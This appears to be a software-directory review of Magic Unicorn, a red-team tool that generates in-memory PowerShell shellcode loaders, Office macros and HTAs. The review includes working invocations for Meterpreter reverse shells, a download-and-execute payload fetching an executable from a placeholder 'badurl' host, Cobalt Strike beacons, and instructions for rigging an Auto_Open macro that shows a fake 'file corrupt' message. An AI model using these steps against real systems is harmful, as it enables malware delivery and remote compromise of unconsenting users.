trustedsec/unicorn: a PowerShell downgrade and in-memory shellcode generator
Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber's powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18.
At a glance
- What is it?
- Magic Unicorn builds a PowerShell command that runs shellcode in memory, and it can wrap that command in an Office macro or an HTA. It is a payload generator for authorised red team work, not a general purpose tool.
- Who is it for?
- Adopt trustedsec/unicorn when you are on an authorised engagement and need a PowerShell command, Office macro or HTA that pulls a Meterpreter session or a Cobalt Strike beacon back to a listener, and you already have Metasploit or Cobalt Strike producing the payload.
- Can I use it commercially?
- Check first. The repository uses a licence we do not classify automatically, so read its LICENSE file before any commercial use.
- Is it still maintained?
- Yes. The repository last received commits 8 days ago.
- What is it written in?
- Mainly Python, according to GitHub's language statistics.
Answers come from the project's GitHub data, last synced on September 29, 2026, and from our analysis. They are not legal advice.
Editorial analysis
What Magic Unicorn generates, and who ends up running it
Magic Unicorn is a Python script that produces a PowerShell command you paste into a command prompt or hand to a payload delivery system. The README describes it as "a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory", and credits Matthew Graeber's PowerShell work plus the bypass technique David Kennedy and Josh Kelly presented at Defcon 18. The audience is narrow: red teamers and penetration testers who already have a listener and a payload from Metasploit, Cobalt Strike or their own shellcode file, and who need the delivery wrapper. It is not a post exploitation framework and it does not give you a session on its own. The README is explicit that "you will need to have a listener enabled in order to capture the attack". Everything the script does sits between a payload you already built and a target that can be made to run PowerShell.
The delivery formats: PowerShell, macro, HTA, DDE and CRT
The script takes a payload argument and a format argument, then writes the wrapper. According to the usage block, plain PowerShell output goes to powershell_attack.txt and unicorn.rc, and the text file "contains all of the code needed in order to inject the powershell attack into memory". The macro path targets Office: you open File, Properties, Ribbons, select Developer, create a macro named Auto_Open and paste the generated code, and the README notes that a message telling the user the file is corrupt is "NORMAL BEHAVIOR", a deliberate part of the trick. For Office 365 and Word 2016 and later, the README says you must change the first output line from Sub Auto_Open() to Sub AutoOpen() and rename the macro to AutoOpen. The HTA path generates index.html plus a second file, and the browser is told what to do with it. There are also dde and crt formats, and a custom PS1 mode where you pass a .ps1 file directly, optionally with a macro and a line count such as 500. One practical warning sits in the README in capitals: when pasting into Excel, remove any extra spaces added after each PowerShell section under the variable "x", or the macro fails with a syntax error. That is a copy and paste problem, not a script bug, and it is the kind of thing that eats an hour on an engagement.
Installing Magic Unicorn and generating a first payload
There is no package. The README shows the script being run directly from a clone, with Python 2 style invocation. Clone the repository, change into it, and run the script with no arguments to see the banner and the usage text. The README's own example is python unicorn.py with nothing after it, which prints the attack vector banner and the usage lines reproduced below.
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.pyThe usage block lists the Metasploit form first: a payload path, a reverse IP address and a port. If you are using a Metasploit method, the README says Metasploit must be installed and on the right path. Running the command below should leave powershell_attack.txt and unicorn.rc in the current directory.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443For a payload that downloads and executes a file rather than opening a Meterpreter session, the README gives a url= argument. This is the form to use when you want the PowerShell code to fetch and run an executable.
python unicorn.py windows/download_exec url=http://badurl.com/payload.exeTo get the macro wrapper instead of the raw command, append macro. The README's example uses the same payload, address and port, with the format word last.
python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macroCobalt Strike users export the beacon in C# format and pass the file with the cs keyword. Raw shellcode is passed as a path to a text file in the 0x00 formatted form, with the shellcode keyword. Both accept macro or hta as the trailing format argument.
python unicorn.py <cobalt_strike_file.cs> cs macro
python unicorn.py <path_to_shellcode.txt> shellcode htaAfter generation, open powershell_attack.txt and paste its contents where you can call the PowerShell executable, or open the macro output and follow the AutoOpen instructions. If nothing appears in the working directory, check that you ran the script from the directory you are looking in.
Where Magic Unicorn is the wrong tool
The script assumes the target will run PowerShell, and the whole approach depends on a downgrade and bypass technique that dates from the Defcon 18 era. Modern Windows builds and current Office versions have moved on, and the README itself carries a patch for Office 365 and Word 2016 and later, which is a sign that the generated macro output needed fixing rather than being current by design. If your engagement targets a hardened endpoint with constrained language mode or script block logging, a pasted PowerShell command is the wrong primitive and you should be looking at your implant's own delivery options instead. The maintenance picture is also worth stating plainly: the repository is not archived and the last push was on 2026-09-22, but there are no release entries, so there is no version to pin and no changelog of shipped fixes to read. CHANGELOG.txt exists in the repository root, which is where you would look, but nothing here summarises it. Treat the script as a generator whose output you review by hand before every use, not as a component you can upgrade on a schedule.
Magic Unicorn compared with Metasploit's own web and macro delivery modules
The obvious alternative is to skip the generator and let Metasploit deliver the payload itself. Metasploit ships web delivery and macro handling that produce a stager and serve it, which keeps the payload, the listener and the delivery in one console session and one set of logs. Magic Unicorn splits that apart: Metasploit or Cobalt Strike produces the payload, and the script only produces the wrapper text you paste or embed. The difference matters when you need the wrapper as a file you can hand to someone else, drop into a document, or paste into a place Metasploit cannot reach, such as an existing SQL injection or a psexec command line. The README names exactly those cases: an Excel or Word document, psexec_commands inside Metasploit, SQLi. If your delivery path is a normal Metasploit handler, the built in modules are less moving parts. If your delivery path is a document or someone else's command line, the generated text file is the point of the tool.
Licence, upgrade cost and what the repository does not tell you
The repository root contains LICENSE.txt, but the repository metadata reports the licence as NOASSERTION, which means GitHub could not classify it automatically. Read LICENSE.txt yourself before you ship anything derived from it, and do not treat this article as legal advice. On upgrades, the cost is mostly re-verification rather than dependency management. There are no releases to follow, so the only signal is the commit history on master, and the last push was on 2026-09-22. The repository has docs/, templates/ and tests/ directories alongside unicorn.py, so there is a template layer between the script and the output files, and a change there can alter the generated PowerShell without any version number moving. The README does not document rollback, and it does not describe a supported Python version, so the first thing to confirm on a new machine is that the script runs at all under your interpreter before you rely on its output.
Editorial conclusion
Adopt trustedsec/unicorn when you are on an authorised engagement and need a PowerShell command, Office macro or HTA that pulls a Meterpreter session or a Cobalt Strike beacon back to a listener, and you already have Metasploit or Cobalt Strike producing the payload. Do not adopt it if you need a maintained, packaged tool with documented releases: there are none, the repository has no release entries, the licence file is present but the repository metadata reports NOASSERTION, and the README does not document rollback. Before you use it, run python unicorn.py --help, confirm that powershell_attack.txt and unicorn.rc were generated in the working directory, and check that your target Office build needs the AutoOpen spelling rather than the legacy Auto_Open.
Frequently asked questions
How do I install trustedsec/unicorn?
There is no package to install. The README shows the script being run directly from a clone with python unicorn.py, and it notes that Metasploit must be installed and in the right path if you use a Metasploit payload method.
What files does trustedsec/unicorn generate?
The README states that everything is generated in two files, powershell_attack.txt and unicorn.rc. The text file holds the code needed to inject the PowerShell attack into memory. The HTA format instead generates index.html plus a second file.
Can trustedsec/unicorn use Cobalt Strike or my own shellcode instead of Metasploit?
Yes. The README lists a Cobalt Strike example that takes a .cs file exported in C# format with the cs keyword, and a shellcode example that takes a path to a text file in 0x00 formatted form with the shellcode keyword.
Why does the macro from trustedsec/unicorn need AutoOpen instead of Auto_Open?
The README says that for Office 365 and Word 2016 and later you must change the first line of the output from Sub Auto_Open() to Sub AutoOpen(), and rename the macro itself to AutoOpen rather than the legacy Auto_Open spelling.
Does trustedsec/unicorn open a session by itself?
No. The README notes that you need a listener enabled in order to capture the attack, and that the generated PowerShell code has to be pasted where you can call the PowerShell executable or delivered through some other remote command injection path.
Official sources
Add this badge to your README
If you maintain this project, the badge below links readers to this analysis and shows its maintenance status from the daily GitHub snapshot. Paste the markdown into your README; add ?metric=license or ?metric=stars to the image URL for a different field.
[](https://hysenlabs.com/projects/trustedsec-unicorn)